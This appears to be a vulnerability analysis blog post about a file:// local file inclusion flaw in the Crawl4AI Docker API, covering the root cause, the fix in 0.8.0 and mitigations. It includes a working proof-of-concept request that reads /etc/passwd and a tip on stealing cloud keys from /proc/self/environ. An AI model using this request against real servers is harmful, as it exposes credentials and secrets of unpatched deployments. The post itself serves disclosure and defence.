Crawl4AI: When Web Scrapers Become File Servers
Jan 17, 2026·5 min read
Executive Summary (TL;DR)
The Crawl4AI Docker API accepted any URL scheme, including `file://`. Attackers could use endpoints like `/execute_js` to read sensitive local files (like `/etc/passwd` or environment variables) simply by asking the crawler to 'visit' them. This is a classic Local File Inclusion (LFI) vulnerability fixed in version 0.8.0.
Crawl4AI, a popular tool for making web content LLM-friendly, inadvertently exposed a massive hole in its Docker API. By failing to validate URL schemes, it allowed unauthenticated attackers to use the `file://` protocol to read local files from the server, turning a useful scraper into a highly effective data exfiltration tool.
The Hook: Feeding the LLM Beast
In the golden age of AI, everyone needs data. Clean, parsed, markdown-ready data. Enter Crawl4AI, an open-source tool designed to crawl websites and spit out content perfectly formatted for Large Language Models. It's a fantastic idea: automate a headless browser, navigate to a URL, scrape the text, and feed the bot.
But here's the catch: Crawl4AI offers a Docker API to make this functionality accessible over a network. This API accepts a JSON payload with a url and instructions on what to extract. The developers assumed you'd pass it https://google.com or https://openai.com.
But security researchers are a cynical bunch. We don't see a 'URL' field; we see a 'URI' field. And browsers—including the headless ones powering this tool—are surprisingly versatile. They don't just speak HTTP; they speak the local filesystem dialect fluent enough to hand over your server's secrets on a silver platter.
The Flaw: The 'file://' Blind Spot
The vulnerability (GHSA-VX9W-5CX4-9796) is a textbook example of Improper Input Validation. The core logic of the API endpoints—specifically /execute_js, /screenshot, /pdf, and /html—takes the user-supplied url parameter and passes it directly to the browser automation engine (likely Playwright under the hood).
Browser engines are designed to be helpful. If you tell Chrome to visit file:///etc/passwd, it renders the password file. If you tell it to visit file:///proc/self/environ, it shows you the environment variables. This behavior is standard for local browsing but catastrophic for a remote web service.
The flaw wasn't a complex buffer overflow or a heap grooming masterclass. It was a logic error: Protocol confusion. The application checked nothing. It didn't ensure the URL started with http:// or https://. It just took the string and said, "Go fetch, boy!" And the browser fetched exactly what it was told, even if that meant reading the /root directory.
The Code: Trusting User Input
While the exact vulnerable code snippet is standard boilerplate for automation, the logic flow looked something like this. Imagine a Python handler for the /execute_js endpoint:
# VULNERABLE LOGIC (Conceptual)
async def execute_js(request):
data = await request.json()
target_url = data.get("url") # No validation!
js_script = data.get("scripts")
# The browser just goes where it's told
page = await browser.new_page()
await page.goto(target_url)
# Execute the script (e.g., return body text)
result = await page.evaluate(js_script)
return json_response(result)See the problem? The code assumes target_url is a web address. It fails to realize that to a browser, file:/// is just another valid address.
The fix (implemented in v0.8.0) is remarkably simple—a sanity check before the browser is even invoked:
# FIXED LOGIC (Conceptual)
async def execute_js(request):
data = await request.json()
target_url = data.get("url")
# The Sanity Check
if not (target_url.startswith("http://") or target_url.startswith("https://")):
raise HTTPException(status_code=400, detail="Invalid protocol. Only HTTP/HTTPS allowed.")
# Proceed safely...The Exploit: Reading /etc/passwd
Exploiting this is trivially easy. You don't need authentication. You don't need to race conditions. You just need curl.
Here is how an attacker dumps the /etc/passwd file from the host system (or the container context). We target the /execute_js endpoint because it allows us to run Javascript on the 'page' (which is actually the local file) and return the text content.
POST /execute_js HTTP/1.1
Host: target-ip:8000
Content-Type: application/json
{
"url": "file:///etc/passwd",
"scripts": ["document.body.innerText"]
}The response comes back with the file contents perfectly formatted:
{
"result": [
"root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin..."
]
}[!NOTE] Pro Tip: Smart attackers don't just stop at
/etc/passwd. They go forfile:///proc/self/environ. In containerized environments, this file often contains the AWS_ACCESS_KEY_ID, DB_PASSWORD, and API keys passed as environment variables. That is the real jackpot.
The Impact: Total Information Disclosure
Why is this an 8.6 High severity? Because the impact is Confidentiality: High.
- Secret Leakage: As mentioned, reading environment variables often leads to full cloud compromise.
- Source Code Theft: An attacker can read the application's own source code (e.g.,
file:///app/main.py) to find other vulnerabilities. - Internal Network Mapping: In some configurations, the browser might be able to access internal dashboards (SSRF via
http://localhost:8080) or local file shares.
Since this API is designed to be deployed as a Docker container, the "Scope" is technically changed (Scope: C). While you are theoretically trapped in the container, modern container deployments often mount sensitive volumes or inject secrets that make this containment purely academic.
The Mitigation: Lock It Down
The immediate fix is to upgrade to version 0.8.0. This version introduces the necessary protocol validation logic.
However, this vulnerability serves as a broader lesson in secure design for automation tools:
- Input Validation: Never trust a URL parameter. Whitelist protocols (
http,https). Block loopback addresses (127.0.0.1,localhost) unless explicitly required. - Least Privilege: Run the container with a read-only filesystem where possible. Don't mount the host's root directory.
- Network Isolation: Does your web scraper need to talk to the internal network? Probably not. Use network policies to deny egress to private RFC1918 addresses.
If you can't upgrade immediately, put a WAF or reverse proxy in front of Crawl4AI and block any JSON payload containing file://.
Official Patches
Technical Appendix
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:NAffected Systems
Affected Versions Detail
| Product | Affected Versions | Fixed Version |
|---|---|---|
crawl4ai unclecode | < 0.8.0 | 0.8.0 |
| Attribute | Detail |
|---|---|
| Attack Vector | Network (API) |
| CVSS | 8.6 (High) |
| CWE | CWE-22 (Path Traversal) |
| Privileges | None (Unauthenticated) |
| Impact | High Confidentiality (File Read) |
| Exploit Status | Functional PoC Available |
MITRE ATT&CK Mapping
The software uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the software does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory.
Known Exploits & Detection
Vulnerability Timeline
Subscribe to updates
Get the latest CVE analysis reports delivered to your inbox.